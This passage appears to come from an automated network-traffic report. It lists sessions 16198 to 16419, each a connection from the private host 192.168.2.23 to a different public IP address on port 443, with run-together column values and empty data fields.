                                          16198192.168.2.2342906167.143.167.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16199192.168.2.233468643.89.64.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16200192.168.2.2360434181.251.185.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16201192.168.2.23404662.230.56.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16202192.168.2.234055039.249.244.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16203192.168.2.2340942113.142.111.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16204192.168.2.2341146184.115.75.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16205192.168.2.234814041.185.96.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16206192.168.2.2340308147.25.29.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16207192.168.2.233283289.253.247.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16208192.168.2.235702440.33.62.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16209192.168.2.2338284173.134.109.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16210192.168.2.234838050.12.234.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16211192.168.2.233300875.203.132.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16212192.168.2.235969866.143.241.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16213192.168.2.234535271.146.147.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16214192.168.2.2358740150.94.60.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16215192.168.2.234539423.36.252.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16216192.168.2.235278467.125.154.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16217192.168.2.2352410177.248.18.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16218192.168.2.2360944139.114.31.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16219192.168.2.235285642.63.164.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16220192.168.2.2350138173.235.167.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16221192.168.2.2360764192.38.89.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16222192.168.2.235774476.87.186.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16223192.168.2.235095057.79.77.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16224192.168.2.2355186204.226.10.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16225192.168.2.234100068.24.201.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16226192.168.2.2346268165.74.103.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16227192.168.2.2344838211.98.4.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16228192.168.2.233984849.180.35.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16229192.168.2.2334946117.46.68.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16230192.168.2.235788272.113.152.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16231192.168.2.23522105.236.188.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16232192.168.2.234291090.85.117.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16233192.168.2.235231886.129.96.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16234192.168.2.2337244197.242.33.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16235192.168.2.233337876.229.178.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16236192.168.2.2349976202.137.126.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16237192.168.2.2335026134.231.249.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16238192.168.2.2348956114.13.44.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16239192.168.2.2360160198.206.151.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16240192.168.2.235713875.89.231.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16241192.168.2.2360732220.69.115.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16242192.168.2.23551549.147.156.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16243192.168.2.235790448.96.224.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16244192.168.2.234983848.117.48.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16245192.168.2.2355046128.254.75.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16246192.168.2.2339288189.102.6.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16247192.168.2.233466687.62.194.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16248192.168.2.2351020172.153.66.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16249192.168.2.233368637.29.165.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16250192.168.2.2346212120.209.107.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16251192.168.2.2344366223.65.15.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16252192.168.2.233380423.28.184.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16253192.168.2.234647434.103.48.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16254192.168.2.233321613.238.180.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16255192.168.2.234517439.37.243.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16256192.168.2.2344252112.174.72.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16257192.168.2.233599236.83.185.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16258192.168.2.2351238171.23.109.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16259192.168.2.2340464149.66.59.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16260192.168.2.2360560180.45.249.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16261192.168.2.2336768159.195.26.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16262192.168.2.2339982105.207.167.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16263192.168.2.2339904216.187.203.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16264192.168.2.233287295.203.66.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16265192.168.2.234011885.215.209.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16266192.168.2.235756031.86.20.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16267192.168.2.2348562111.224.181.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16268192.168.2.235415096.137.49.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16269192.168.2.2356100192.34.224.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16270192.168.2.234116223.126.134.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16271192.168.2.23414261.48.241.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16272192.168.2.233345854.53.33.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16273192.168.2.235348444.244.14.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16274192.168.2.235644096.56.153.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16275192.168.2.2353358162.249.173.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16276192.168.2.233581697.132.127.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16277192.168.2.235763818.237.105.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16278192.168.2.233682299.204.57.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16279192.168.2.233913413.121.149.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16280192.168.2.2332864181.175.121.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16281192.168.2.2349604203.164.204.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16282192.168.2.2336682175.164.62.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16283192.168.2.2350862178.219.74.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16284192.168.2.23396089.37.4.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16285192.168.2.2356164147.228.47.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16286192.168.2.235377452.184.87.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16287192.168.2.2356378103.177.94.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16288192.168.2.2346086196.250.253.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16289192.168.2.2348208124.10.94.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16290192.168.2.2335752139.205.27.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16291192.168.2.2346498109.203.253.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16292192.168.2.234843476.100.199.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16293192.168.2.236079295.54.32.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16294192.168.2.2360592190.101.108.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16295192.168.2.2353878145.243.37.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16296192.168.2.234788886.196.234.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16297192.168.2.233943489.217.225.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16298192.168.2.2336030105.164.204.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16299192.168.2.2334770121.224.209.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16300192.168.2.2336888202.107.18.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16301192.168.2.2353622217.174.227.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16302192.168.2.233441638.70.19.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16303192.168.2.233757025.99.18.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16304192.168.2.2358140161.14.140.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16305192.168.2.2338582113.90.32.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16306192.168.2.2354266188.241.64.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16307192.168.2.235059083.117.85.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16308192.168.2.23343784.29.83.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16309192.168.2.2339786223.219.102.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16310192.168.2.2341944209.26.207.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16311192.168.2.2353518139.165.113.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16312192.168.2.2337588117.102.245.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16313192.168.2.234648074.136.151.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16314192.168.2.2353684118.225.125.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16315192.168.2.23514041.92.170.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16316192.168.2.235754418.140.166.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16317192.168.2.234058444.125.90.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16318192.168.2.2344714202.192.173.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16319192.168.2.23458304.157.0.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16320192.168.2.2333482192.165.217.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16321192.168.2.2347934176.76.184.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16322192.168.2.233892485.237.17.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16323192.168.2.233454897.35.24.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16324192.168.2.2350336205.39.125.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16325192.168.2.235603675.211.169.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16326192.168.2.234488659.66.240.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16327192.168.2.234887082.171.189.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16328192.168.2.23531924.116.46.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16329192.168.2.2350156223.30.119.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16330192.168.2.235374024.212.48.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16331192.168.2.2350164104.64.182.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16332192.168.2.233487032.5.30.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16333192.168.2.234142446.177.173.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16334192.168.2.233923883.225.51.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16335192.168.2.2337724182.101.218.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16336192.168.2.2338018181.119.228.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16337192.168.2.234606213.3.148.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16338192.168.2.2336998197.6.178.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16339192.168.2.234442283.188.43.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16340192.168.2.2349138204.24.172.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16341192.168.2.2339292111.69.189.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16342192.168.2.2357732156.137.35.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16343192.168.2.2347352192.218.144.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16344192.168.2.2342104195.100.237.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16345192.168.2.233560631.26.192.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16346192.168.2.235326251.80.21.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16347192.168.2.234825058.229.126.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16348192.168.2.2351592183.215.112.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16349192.168.2.2341054172.114.222.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16350192.168.2.2358814156.104.14.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16351192.168.2.235135434.74.100.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16352192.168.2.234995440.199.93.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16353192.168.2.2334118107.64.109.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16354192.168.2.234333859.72.70.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16355192.168.2.233614449.104.29.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16356192.168.2.2343884180.164.165.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16357192.168.2.2342898105.104.2.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16358192.168.2.23366744.82.8.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16359192.168.2.2340270186.9.2.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16360192.168.2.2340152178.152.156.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16361192.168.2.2344918195.208.74.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16362192.168.2.2335120152.172.111.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16363192.168.2.234459682.48.193.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16364192.168.2.2345464124.60.110.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16365192.168.2.2355188223.129.152.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16366192.168.2.2352114213.120.104.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16367192.168.2.2344762117.45.48.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16368192.168.2.2356970170.102.51.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16369192.168.2.235324099.149.254.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16370192.168.2.234758879.229.119.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16371192.168.2.2359908154.118.91.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16372192.168.2.233360065.48.242.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16373192.168.2.2356430148.234.94.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16374192.168.2.234434467.193.54.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16375192.168.2.234559692.44.103.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16376192.168.2.2340370148.60.166.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16377192.168.2.2341276207.37.119.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16378192.168.2.235374884.133.205.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16379192.168.2.2353076104.234.52.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16380192.168.2.2356756140.116.161.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16381192.168.2.2341726212.194.56.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16382192.168.2.235092480.156.91.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16383192.168.2.2336234186.119.245.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16384192.168.2.2333738125.60.101.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16385192.168.2.233407227.13.223.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16386192.168.2.2337440155.193.95.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16387192.168.2.2360302222.224.109.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16388192.168.2.2360296129.167.114.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16389192.168.2.2341842194.217.155.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16390192.168.2.2358892148.90.39.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16391192.168.2.233453438.122.190.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16392192.168.2.2360280223.62.51.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16393192.168.2.2345894117.44.64.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16394192.168.2.234806635.204.167.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16395192.168.2.2358440219.24.170.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16396192.168.2.2337702153.26.201.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16397192.168.2.2354496217.121.214.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16398192.168.2.2333422105.56.103.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16399192.168.2.2350958167.209.175.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16400192.168.2.2346106206.176.38.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16401192.168.2.2343832116.140.98.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16402192.168.2.234376020.50.220.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16403192.168.2.233708235.188.223.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16404192.168.2.2345418135.63.155.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16405192.168.2.2345620182.219.165.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16406192.168.2.2332822171.19.135.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16407192.168.2.2358376118.209.135.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16408192.168.2.235129653.30.53.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16409192.168.2.2355074208.93.250.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16410192.168.2.2346634213.30.20.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16411192.168.2.2351266146.208.109.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16412192.168.2.2356916146.206.211.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16413192.168.2.2346948163.237.205.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16414192.168.2.235585858.136.207.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16415192.168.2.2343844123.137.247.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16416192.168.2.236035298.239.251.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16417192.168.2.2336844209.175.31.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16418192.168.2.2358540212.243.210.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16419192.168.2.2344506163.248.126.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
